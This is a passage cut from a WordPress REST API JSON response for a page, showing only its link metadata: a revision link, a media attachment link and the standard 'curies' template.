d":581,"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/pages\/572\/revisions\/581"}],"wp:attachment":[{"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/media?parent=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}